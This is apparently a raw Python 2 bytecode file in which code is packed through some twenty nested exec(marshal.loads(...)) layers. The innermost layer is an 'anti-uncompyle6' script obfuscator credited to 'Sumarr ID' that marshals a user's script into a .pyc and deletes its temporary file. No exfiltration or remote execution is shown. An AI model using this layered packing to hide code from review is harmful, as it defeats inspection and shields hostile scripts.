\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xe4!\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\
x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns{ \x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x12\x1f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xa9\x1d\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns@\x1c\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x
01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xd7\x1a\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Nsn\x19\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x05\x18\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00
\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x9c\x16\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns3\x15\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xca\x13\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Nsa\x12\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x
00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xf8\x10\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x8f\x0f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns&\x0e\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xbd\x0c\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x
00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00NsT\x0b\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xeb\t\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x82\x08\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\
x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x19\x07\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xb0\x05\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00NsG\x04\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x17\x01\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x02\x00GHd\x03\x00GHe\x04\x00d\x04\x00\x83\x01\x00Z\x05\x00e\x06\x00e\x05\x00\x83\x01\x00j\x07\x00\x83\x00\x00Z\x08\x00e\x06\x00d\x05\x00d\x06\x00\x83\x02\x00Z\t\x00e\t\x00j\n\x00d\x07\x00\x83\x01\x00\x01x!\x00e\x0b\x00d\x08\x00\x83\x01\x00D]\x13\x00Z\x0c\x00e\t\x00j\n\x00d\t\x00\x83\x01\x00\x01q\x81\x00We\t\x00j\n\x00d\n\x00\x83\x01\x00\x01e\r\x00e\x08\x00d\x0b\x00d\x0c\x00\x83\x03\x00Z\x05\x00e\x03\x00j\x0e\x00e\x05\x00\x83\x01\x00Z\x0f\x00e\x10\x00e\x0f\x00\x83\x01\x00Z\x11\x00e\t\x00j\n\x00d\r\x00e\x11\x00\x17d\x0e\x00\x17\x83\x01\x00\x01e\t\x00j\x12\x00\x83\x00\x00\x01e\x02\x00j\r\x00d\x05\x00d\x0f\x00\x83\x
02\x00\x01e\x00\x00j\x13\x00d\x10\x00\x83\x01\x00\x01d\x11\x00GHd\x01\x00S(\x12\x00\x00\x00i\xff\xff\xff\xffNs\xb6\x00\x00\x00==========================================\n# ENCRYPT PYTHON\n# ANTI UNCOMPYLE6\n\n# author : Sumarr ID\n# gitlab : https://gitlab.com/Sumarr-ID\n==========================================s\x1f\x00\x00\x00contoh : /sdcard/Download/sc.pys\x08\x00\x00\x00# file: s\x05\x00\x00\x00au.pyt\x01\x00\x00\x00ws\x11\x00\x00\x00astaghfirullah=(\ni\xdf\xf3\x00\x00sE\x00\x00\x00"astaghfirullah","astaghfirullah","astaghfirullah","astaghfirullah",\ns\x02\x00\x00\x00)\nt\x06\x00\x00\x00Sumarrt\x04\x00\x00\x00execsK\x00\x00\x00# Encrypt by Sumarr ID\n# RECODE_BERKELAS\nimport marshal\nexec(marshal.loads(s\x02\x00\x00\x00))s\x06\x00\x00\x00ok.pycs\x08\x00\x00\x00rm au.pys\x0f\x00\x00\x00# hasil: ok.pyc(\x14\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\n\x00\x00\x00py_compilet\x07\x00\x00\x00marshalt\t\x00\x00\x00raw_inputt\x01\x00\x00\x00at\x04\x00\x00\x00opent\x04\x00\x00\x00readt\x01\x00\x00\x00bt\x01\x00\x00\x00yt\x05\x00\x00\x00writet\x05\x00\x00\x00ranget\x01\x00\x00\x00it\x07\x00\x00\x00compilet\x05\x00\x00\x00dumpst\x01\x00\x00\x00mt\x04\x00\x00\x00reprt\x01\x00\x00\x00st\x05\x00\x00\x00closet\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x01\x00\x00\x00s"\x00\x00\x000\x08\x05\x01\x05\x01\x0c\x01\x12\x01\x0f\x01\r\x01\x13\x01\x11\x01\r\x01\x12\x01\x0f\x01\x0c\x01\x15\x01\n\x01\x10\x01\r\x01(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\
x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00
\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\
x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00